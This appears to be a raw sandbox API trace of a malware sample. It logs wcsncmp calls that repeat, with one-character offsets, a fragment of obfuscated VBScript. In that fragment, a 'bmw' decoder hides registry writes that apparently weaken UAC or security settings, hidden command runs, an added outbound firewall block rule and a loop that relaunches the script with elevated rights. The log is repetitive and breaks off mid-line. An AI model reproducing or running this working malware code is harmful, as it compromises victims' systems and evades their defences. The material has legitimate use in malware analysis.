WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 33 [0226.376] wcsncmp (_String1="Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 52 [0226.376] wcsncmp (_String1="pplicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 99 [0226.376] wcsncmp (_String1="plicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 99 [0226.376] wcsncmp (_String1="licationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 95 [0226.376] wcsncmp (_String1="icationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite 